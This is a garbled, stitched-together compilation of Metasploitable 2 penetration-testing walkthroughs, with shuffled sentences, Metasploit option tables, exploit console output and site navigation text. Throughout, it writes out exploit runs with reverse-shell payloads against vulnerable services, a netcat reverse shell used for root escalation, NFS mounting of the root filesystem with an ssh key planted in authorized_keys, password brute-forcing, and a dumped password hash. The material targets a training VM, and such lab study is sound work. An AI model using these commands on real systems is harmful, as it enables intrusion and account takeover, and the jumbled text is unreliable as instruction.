To begin using the Metasploit interface, open the Kali Linux terminal and type msfconsole. [*] USER: 331 Please specify the password. Commands end with ; or \g. SRVPORT 8080 yes The local port to listen on.
DB_ALL_PASS false no Add all passwords in the current database to the list
Just enter ifconfig at the prompt to see the details for the virtual machine. Currently missing is documentation on the web server and web application flaws as well as vulnerabilities that allow a local user to escalate to root privileges. Start/Stop Stop: Open services.msc. We will now exploit the argument injection vulnerability of PHP 2.4.2 using Metasploit. RPORT 5432 yes The target port
In additional to the more blatant backdoors and misconfigurations, Metasploitable 2 has terrible password security for both system and database server accounts. .
[*] Banner: 220 (vsFTPd 2.3.4)
Module options (exploit/linux/local/udev_netlink):
payload => java/meterpreter/reverse_tcp
[*] Writing to socket B
SMBUser no The username to authenticate as
When running as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. Metasploitable 2 Among security researchers, Metasploitable 2 is the most commonly exploited online application.
0 Automatic Target
Perform a ping of IP address 127.0.0.1 three times. [*] Attempting to automatically select a target
Id Name
Highlighted in red underline is the version of Metasploit. Once Metasploitable 2 is up and running and you have the IP address (mine will be 10.0.0.22 for this walkthrough), then you want to start your scan.
We will do this by hacking FTP, telnet and SSH services. This document outlines many of the security flaws in the Metasploitable 2 image.
In the video the Metasploitable-2 host is running at 192.168.56.102 and the Backtrack 5-R2 host at 192.168.56.1.3. Metasploitable 2 is a straight-up download. The vulnerability being demonstrated here is how a backdoor was incorporated into the source code of a commonly used package, namely vsftp. It is also possible to abuse the manager application using /manager/html/upload, but this approach is not incorporated in this module. Using Metasploit and Nmap to enumerate and scan for vulnerabilities In this article, we will discuss combining Nmap and Metasploit together to perform port scanning and enumerate for. [*] Command: echo qcHh6jsH8rZghWdi;
The root directory is shared.
Metasploitable is installed, msfadmin is user and password. [*] Automatically selected target "Linux x86"
Using Exploits. Lets move on. RHOSTS => 192.168.127.154
After you have downloaded the Metasploitable 2 file, you will need to unzip the file to see its contents.
The following sections describe the requirements and instructions for setting up a vulnerable target.
USER_AS_PASS false no Try the username as the Password for all users
Set Version: Ubuntu, and to continue, click the Next button.
Id Name
First, from the terminal of your running Metasploitable2 VM, find its IP address.. Reference: Linux IP command examples Second, from the terminal of your Kali VM, use nmap to scan for open network services in the Metasploitable2 VM.
[*] Writing to socket B
Lets go ahead. URI => druby://192.168.127.154:8787
The problem with this service is that an attacker can easily abuse it to run a command of their choice, as demonstrated by the Metasploit module usage below.
msf auxiliary(postgres_login) > show options
This virtual machine (VM) is compatible with VMWare, VirtualBox, and other common virtualization platforms. msf exploit(postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp
The web server starts automatically when Metasploitable 2 is booted. msf exploit(distcc_exec) > exploit
Metasploitable 2 is a deliberately vulnerable Linux installation. Additionally, an ill-advised PHP information disclosure page can be found at http:///phpinfo.php.
For more information on Metasploitable 2, check out this handy guide written by HD Moore. payload => cmd/unix/reverse
VERBOSE false no Enable verbose output
RHOST yes The target address
The risk of the host failing or to become infected is intensely high. [*] Accepted the first client connection
To proceed, click the Next button.
msf exploit(usermap_script) > show options
- Cisco 677/678 Telnet Buffer Overflow . The primary administrative user msfadmin has a password matching the username.
This is Metasploitable2 (Linux) Metasploitable is an intentionally vulnerable Linux virtual machine.
In this example, the URL would be http://192.168.56.101/phpinfo.php. The purpose of this video is to create virtual networking environment to learn more about ethical hacking using Metasploit framework available in Kali Linux..
Need to report an Escalation or a Breach?
Mutillidae has numerous different types of web application vulnerabilities to discover and with varying levels of difficulty to learn from and challenge budding Pentesters. Were going to use netcat to connect to the attacking machine and give it a shell: Listen on port 5555 on the attackers machine: Now that all is set up, I just make the exploit executable on the victim machine and run it: Now, for the root shell, check our local netcat listener: A little bit of work on that one, but all the more satisfying! [*] Auxiliary module execution completed, msf > use exploit/linux/postgres/postgres_payload
Lets see if we can really connect without a password to the database as root. Set the SUID bit using the following command: chmod 4755 rootme. ---- --------------- -------- -----------
msf exploit(tomcat_mgr_deploy) > show option
msf exploit(unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse
RPORT 139 yes The target port
msf > use exploit/multi/misc/java_rmi_server
Here's what's going on with this vulnerability.
URI /twiki/bin yes TWiki bin directory path
[*] Matching
Totals: 2 Items. [*] Scanned 1 of 1 hosts (100% complete)
Metasploit Discover target information, find vulnerabilities, attack and validate weaknesses, and collect evidence. [*] B: "ZeiYbclsufvu4LGM\r\n"
Mitigation: Update .
Once we get a clear vision on the open ports, we can start enumerating them to see and find the running services alongside their version. Set Version: Ubuntu, and to continue, click the Next button. Here is a brief outline of the environment being used: First we need to list what services are visible on the target: This shows that NFS (Network File System) uses port 2049 so next lets determine what shares are being exported: The showmount command tells us that the root / of the file system is being shared.
USERNAME no The username to authenticate as
The Metasploit Framework from Rapid7 is one of the best-known frameworks in the area of vulnerability analysis, and is used by many Red Teams and penetration testers worldwide. [*] Reading from socket B
Backdoors - A few programs and services have been backdoored. A list that may be useful to readers that are studying for a certification exam or, more simply, to those who just want to have fun! RHOSTS => 192.168.127.154
The -Pn flag prevents host discovery pings and just assumes the host is up.
In our testing environment, the IP of the attacking machine is 192.168.127.159, and the victim machine is 192.168.127.154. . msf exploit(twiki_history) > set RHOST 192.168.127.154
In the next section, we will walk through some of these vectors.
Pass the udevd netlink socket PID (listed in /proc/net/netlink, typically is the udevd PID minus 1) as argv[1]. msf exploit(tomcat_mgr_deploy) > exploit
[*] A is input
RPORT 6667 yes The target port
We can read the passwords now and all the rest: root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.
0 Generic (Java Payload)
(Note: See a list with command ls /var/www.) root, msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
Module options (auxiliary/scanner/smb/smb_version):
What is Metasploit This is a tool developed by Rapid7 for the purpose of developing and executing exploits against vulnerable systems. Our Pentesting Lab will consist of Kali Linux as the attacker and Metasploitable 2 as the target. [*] Writing to socket A
By default, msfconsole opens up with a banner; to remove that and start the interface in quiet mode, use the msfconsole command with the -q flag.
msf exploit(postgres_payload) > use exploit/linux/local/udev_netlink
msf auxiliary(smb_version) > show options
msf auxiliary(postgres_login) > set STOP_ON_SUCCESS true
0 Automatic
What is Metasploit This is a tool developed by Rapid7 for the purpose of developing and executing exploits against vulnerable systems. LHOST => 192.168.127.159
There are a number of intentionally vulnerable web applications included with Metasploitable. URIPATH no The URI to use for this exploit (default is random)
[*] Reading from socket B
daemon, whereis nc
TWiki is a flexible, powerful, secure, yet simple web-based collaboration platform. Step 8: Display all the user tables in information_schema. DATABASE template1 yes The database to authenticate against
So, as before with MySQL, it is possible to log into this database, but we have checked for the available exploits of Metasploit and discovered one which can further the exploitation: The Postgresaccount may write to the /tmp directory onsome standard Linux installations of PostgreSQL and source the UDF Shared Libraries om there, enabling arbitrary code execution. From the shell, run the ifconfig command to identify the IP address. This must be an address on the local machine or 0.0.0.0
Metasploitable is a Linux virtual machine that is intentionally vulnerable. In Metasploit, an exploit is available for the vsftpd version.
Setting 3 levels of hints from 0 (no hints) to 3 (maximum hints).
15. This version contains a backdoor that went unnoticed for months - triggered by sending the letters "AB" following by a system command to the server on any listening port. [*] Accepted the second client connection
msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.127.154
Both operating systems will be running as VM's within VirtualBox.
SESSION => 1
Keywords vulnerabilities, penetration testing, Metasploit, Metasploitable 2, Metasploitable 3, pen-testing, exploits, Nmap, and Kali Linux Introduction Metasploitable 3 is an intentionally vulnerable Windows Server 2008R2 server, and it is a great way to learn about exploiting windows operating systems using Metasploit. Module options (exploit/multi/http/tomcat_mgr_deploy):
msf exploit(twiki_history) > exploit
[*] Writing to socket B
TOMCAT_USER no The username to authenticate as
[-] Exploit failed: Errno::EINVAL Invalid argument
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
It contains well written, well thought and well explained computer science and programming articles, quizzes and practice/competitive programming/company interview Questions. Digital Forensics and Incident Response (DFIR), Cloud Security with Unlimited Vulnerability Management, 24/7 MONITORING & REMEDIATION FROM MDR EXPERTS, SCAN MANAGEMENT & VULNERABILITY VALIDATION, PLAN, BUILD, & PRIORITIZE SECURITY INITIATIVES, SECURE EVERYTHING CONNECTED TO A CONNECTED WORLD, THE LATEST INDUSTRY NEWS AND SECURITY EXPERTISE, PLUGINS, INTEGRATIONS & DEVELOPER COMMUNITY, UPCOMING OPPORTUNITIES TO CONNECT WITH US. VM version = Metasploitable 2, Ubuntu 64-bit Kernel release = 2.6.24-16-server IP address = 10.0.2.4 Login = msfadmin/msfadmin NFS Service vulnerability First we need to list what services are visible on the target: Performing a port scan to discover the available services using the Network Mapper 'nmap'. 0 Automatic
Have you used Metasploitable to practice Penetration Testing?
Previous versions of Metasploitable were distributed as a VM snapshot where everything was set up and saved in that state .
[*] 192.168.127.154:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
865.1 MB. The login for Metasploitable 2 is msfadmin:msfadmin. This is Bypassing Authentication via SQL Injection.
The nmap command uses a few flags to conduct the initial scan. An attacker can implement arbitrary OS commands by introducing a rev parameter that includes shell metacharacters to the TWikiUsers script. For your test environment, you need a Metasploit instance that can access a vulnerable target. [*] Auxiliary module execution completed, msf > use exploit/unix/webapp/twiki_history
We chose to delve deeper into TCP/5900 - VNC and used the Metasploit framework to brute force our way in with what ended up being a very weak . I thought about closing ports but i read it isn't possible without killing processes. 0 Automatic
[*] Accepted the second client connection
Once the VM is available on your desktop, open the device, and run it with VMWare Player.
STOP_ON_SUCCESS => true
And this is what we get: Differences between Metasploitable 3 and the older versions. [*] Reading from sockets
The two dashes then comment out the remaining Password validation within the executed SQL statement. Sources referenced include OWASP (Open Web Application Security Project) amongst others. LHOST => 192.168.127.159
---- --------------- -------- -----------
msf auxiliary(telnet_version) > set RHOSTS 192.168.127.154
Here in Part 2 we are going to continue looking at vulnerabilities in other Web Applications within the intentionally vulnerable Metasploitable Virtual Machine (VM). Then start your Metasploit 2 VM, it should boot now. Learn Ethical Hacking and Penetration Testing Online. Exploit target:
But unfortunately everytime i perform scan with the . Tip How to use Metasploit commands and exploits for pen tests These step-by-step instructions demonstrate how to use the Metasploit Framework for enterprise vulnerability and penetration testing. PASSWORD => tomcat
[*] 192.168.127.154:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
Step 7: Bootup the Metasploitable2 machine and login using the default user name and Password: In this tutorial, we will walk through numerous ways to exploit Metasploitable 2, the popular vulnerable machine from Rapid7. whoami
Learn ethical hacking, penetration testing, cyber security, best security and web penetration testing techniques from best ethical hackers in security field. Working with the Vulnerability Validation Wizard, Validating Vulnerabilities Discovered by Nexpose, Social Engineering Campaign Details Report, Single Password Testing MetaModule Report, Understanding the Credentials Domino MetaModule Findings, Segmentation and Firewall Testing MetaModule, Managing the Database from the Pro Console, Metasploit service can"t bind to port 3790, Items Displaying Incorrectly After Update, Installation failed: Signature failure Error, Use Meterpreter Locally Without an Exploit, Issue Restarting on Windows Due to RangeError, Social Engineering Campaigns Report Image Broken, Social Engineering Campaign Taking a Long Time, Downloading and Setting Up Metasploitable 2, Identifying Metasploitable 2's IP Address, https://information.rapid7.com/metasploitable-download.html, https://sourceforge.net/projects/metasploitable/. msf exploit(usermap_script) > set payload cmd/unix/reverse
msf exploit(udev_netlink) > exploit
Step 2:Now extract the Metasploitable2.zip (downloaded virtual machine) into C:/Users/UserName/VirtualBox VMs/Metasploitable2. [*] B: "qcHh6jsH8rZghWdi\r\n"
Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. An exploit executes a sequence of commands that target a specific vulnerability found in a system or application to provide the attacker with access to the system.
[*] Reading from socket B
Return to the VirtualBox Wizard now. [*] Started reverse handler on 192.168.127.159:4444
RPORT => 445
LPORT 4444 yes The listen port
Restart the web server via the following command. If a username is sent that ends in the sequence :) [ a happy face ], the backdoored version will open a listening shell on port 6200. payload => cmd/unix/reverse
Therefore, well stop here.
[*] 192.168.127.154:5432 Postgres - [01/20] - Trying username:'postgres' with password:'postgres' on database 'template1'
[*] Meterpreter session 1 opened (192.168.127.159:4444 -> 192.168.127.154:37141) at 2021-02-06 22:49:17 +0300
root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/, root@ubuntu:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys, Last login: Fri Jun 1 00:29:33 2012 from 192.168.99.128, root@ubuntu:~# telnet 192.168.99.131 6200, msf > use exploit/unix/irc/unreal_ircd_3281_backdoor, msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.99.131, msf exploit(unreal_ircd_3281_backdoor) > exploit. The version range is somewhere between 3 and 4.
In this demonstration we are going to use the Metasploit Framework (MSF) on Kali Linux against the TWiki web app on Metasploitable. RHOST => 192.168.127.154
SRVHOST 0.0.0.0 yes The local host to listen on. With the udev exploit, We'll exploit the very same vulnerability, but from inside Metasploit this time:
You can edit any TWiki page.
One way to accomplish this is to install Metasploitable 2 as a guest operating system in Virtual Box and change the network interface settings from "NAT" to "Host Only". LHOST => 192.168.127.159
It is also instrumental in Intrusion Detection System signature development. echo 'nc -e /bin/bash 192.168.127.159 5555' >> /tmp/run, nc: connect to 192.168.127.159 5555 from 192.168.127.154 (192.168.127.154) 35539 [35539]
RHOST yes The target address
msf exploit(java_rmi_server) > exploit
From the results, we can see the open ports 139 and 445. [*] 192.168.127.154:5432 Postgres - Disconnected
UnrealIRCD 3.2.8.1 Backdoor Command Execution | Metasploit Exploit Database (DB) SMBPass no The Password for the specified username
Our Pentesting Lab will consist of Kali Linux as the attacker and Metasploitable 2 as the target. Utilizing login / password combinations suggested by theUSER FILE, PASS FILE and USERPASS FILE options, this module tries to validate against a PostgreSQL instance.
Unlike other vulnerable virtual machines, Metasploitable focuses on vulnerabilities at the operating system and network services layer instead of custom, vulnerable .
It gives you everything you need from scanners to third-party integrations that you will need throughout an entire penetration testing lifecycle. msf exploit(java_rmi_server) > set RHOST 192.168.127.154
The Nessus scan showed that the password password is used by the server. The backdoor was quickly identified and removed, but not before quite a few people downloaded it. msf exploit(distcc_exec) > set LHOST 192.168.127.159
Tutorials on using Mutillidae are available at the webpwnized YouTube Channel.
SSLCert no Path to a custom SSL certificate (default is randomly generated)
msf exploit(drb_remote_codeexec) > set URI druby://192.168.127.154:8787
High-end tools like Metasploit and Nmap can be used to test this application by security enthusiasts. Module options (exploit/unix/webapp/twiki_history):
Nessus was able to login with rsh using common credentials identified by finger. Either the accounts are not password-protected, or ~/.rhosts files are not properly configured.
Module options (exploit/linux/postgres/postgres_payload):
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
CVE is a list of publicly disclosed cybersecurity vulnerabilities that is free to search, use, and incorporate into products and services, per the terms of use.
Now we narrow our focus and use Metasploit to exploit the ssh vulnerabilities.
Effectively what happens is that the Name validation is made to always be true by closing off the field with a single quote and using the OR operator. Copyright (c) 2000, 2021, Oracle and/or its affiliates. In the current version as of this writing, the applications are. RHOSTS yes The target address range or CIDR identifier
XSS via any of the displayed fields.
There was however an error generated though this did not stop the ability to run commands on the server including ls -la above and more: Whilst we can consider this a success, repeating the exploit a few times resulted in the original error returned. Attackers can implement arbitrary commands by defining a username that includes shell metacharacters. [*] Reading from socket B
NFS can be identified by probing port 2049 directly or asking the portmapper for a list of services. The list is organized in an interactive table (spreadsheet) with the most important information about each module in one row, namely: Exploit module name with a brief description of the exploit List of platforms and CVEs (if specified in the module)
You can view CVE vulnerability details, exploits, references, metasploit modules, full list of vulnerable products and cvss score reports and vulnerability trends over time (e.g.
Vulnerability assessment tools or scanners are used to identify vulnerabilities within the network. A malicious backdoor that was introduced to the VSFTPD download archive is exploited by this module. -- ----
Name Current Setting Required Description
set PASSWORD postgres
Since we noticed previously that the MySQL database was not secured by a password, were going to use a brute force auxiliary module to see whether we can get into it.
The vulnerabilities identified by most of these tools extend . payload => cmd/unix/interact
Id Name
VHOST no HTTP server virtual host
[*] B: "7Kx3j4QvoI7LOU5z\r\n"
Proxies no Use a proxy chain
[+] Found netlink pid: 2769
Associated Malware: FINSPY, LATENTBOT, Dridex. Exploit target:
Name Current Setting Required Description
LHOST => 192.168.127.159
To access a particular web application, click on one of the links provided.
Id Name
Exploit target:
S /tmp/run
I am new to penetration testing . msf exploit(drb_remote_codeexec) > exploit
VHOST no HTTP server virtual host
In order to proceed, click on the Create button.
---- --------------- -------- -----------
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead.
msf exploit(vsftpd_234_backdoor) > show payloads
---- --------------- -------- -----------
Within Metasploitable edit the following file via command: Next change the following line then save the file: In Kali Linux bring up the Mutillidae web application in the browser as before and click the Reset DB button to re-initialize the database.
Inject the XSS on the register.php page.XSS via the username field, Parameter pollutionGET for POSTXSS via the choice parameterCross site request forgery to force user choice. Alternatively, you can also use VMWare Workstation or VMWare Server. Set-up This . The Mutillidae web application (NOWASP (Mutillidae)) contains all of the vulnerabilities from the OWASP Top Ten plus a number of other vulnerabilities such as HTML-5 web storage, forms caching, and click-jacking. Return to the VirtualBox Wizard now. For a more up-to-date version visit: This version will not install on Metasploitable due to out-of-date packages so best to load it onto a Linux VM such as Kali or Ubuntu.
Step 4: Display Database Version.
[*] Accepted the first client connection
Description. Display the contents of the newly created file. In the next tutorial we'll use metasploit to scan and detect vulnerabilities on this metasploitable VM. tomcat55, msf > use exploit/linux/misc/drb_remote_codeexec
[*] Matching
It requires VirtualBox and additional software. NOTE: Compatible payload sets differ on the basis of the target selected. [*] Writing to socket B
[*] Command shell session 3 opened (192.168.127.159:4444 -> 192.168.127.154:41975) at 2021-02-06 23:31:44 +0300
This module takes advantage of the RMI Registry and RMI Activation Services default configuration, allowing classes to be loaded from any remote URL (HTTP). :14747:0:99999:7::: The Nessus scan that we ran against the target demonstrated the following: It is possible to access a remote database server without a password. [*] Started reverse handler on 192.168.127.159:4444
[+] 192.168.127.154:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'
---- --------------- -------- -----------
Additionally three levels of hints are provided ranging from "Level 0 - I try harder" (no hints) to "Level 2 - noob" (Maximum hints). msf exploit(usermap_script) > show options
To take advantage of this, make sure the "rsh-client" client is installed (on Ubuntu), and run the following command as your local root user.
On Metasploitable 2, there are many other vulnerabilities open to exploit.
---- --------------- -------- -----------
Getting started
Do you have any feedback on the above examples?
In this article we continue to demonstrate discovering & exploiting some of the intentional vulnerabilities within a Metasploitable penetration testing target.
[*] Found shell. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the.
The same exploit that we used manually before was very simple and quick in Metasploit.
Id Name
Id Name
RPORT 3632 yes The target port
Module options (auxiliary/scanner/postgres/postgres_login):
Here are the outcomes.
[+] 192.168.127.154:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.) msf auxiliary(tomcat_administration) > set RHOSTS 192.168.127.154
Name Current Setting Required Description
Step 3: Always True Scenario. Name Current Setting Required Description
Metasploitable 3 is a build-it-on-your-own-system operating system.
Welcome to the MySQL monitor. You'll need to take note of the inet address. We have found the following appropriate exploit: TWiki History TWikiUsers rev Parameter Command Execution.
msf exploit(distcc_exec) > show options
Heres a description and the CVE number: On Debian-based operating systems (OS), OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 uses the random number generator that produces predictable numbers, making it easier for remote attackers to perform brute force guessing attacks on cryptographic keys. So I'm going to exploit 7 different remote vulnerabilities , here are the list of vulnerabilities. We againhave to elevate our privileges from here. msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
This is about as easy as it gets. This document will continue to expand over time as many of the less obvious flaws with this platform are detailed. Some folks may already be aware of Metasploitable, an intentionally vulnerable virtual machine designed for training, exploit testing, and general target practice. You could log on without a password on this machine. Step 1:Type the Virtual Machine name (Metasploitable-2) and set the Type: Linux.
RHOST => 192.168.127.154
Metasploitable Databases: Exploiting MySQL with Metasploit: Metasploitable/MySQL Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres Metasploitable Networking: RHOST 192.168.127.154 yes The target address
So, lets set it up: mkdir /metafs # this will be the mount point, mount -t nfs 192.168.127.154:/ /metafs -o nolock # mount the remote shared directory as nfs and disable file locking. msf exploit(drb_remote_codeexec) > set payload cmd/unix/reverse
However this host has old versions of services, weak passwords and encryptions.
Description: In this video I will show you how to exploit remote vulnerabilities on Metasploitable -2 . Loading of any arbitrary web page on the Interet or locally including the sites password files.Phishing, SQL injection to dump all usernames and passwords via the username field or the password fieldXSS via any of the displayed fields. Accessing it is easy: In addition to the malicious backdoors in the previous section, some services are almost backdoors by their very nature. -- ----
The FTP server has since been fixed but here is how the affected version could be exploited: In the previous section we identified that the FTP service was running on port 21, so lets try to access it via telnet: This vulnerability can also be exploited using the Metasploit framework using the VSFTPD v2.3.4 Backdoor Command Execution. (Note: A video tutorial on installing Metasploitable 2 is available here.).
msf exploit(java_rmi_server) > set payload java/meterpreter/reverse_tcp
Step 6: On the left menu, click the Network button and change your network adapter settings as follows: Advanced Select: Promiscuous Mode as Allow All Attached, Network Setting: Enable Network Adapter and select Ethernet or Wireless.
Have you used Metasploitable to practice Penetration Testing?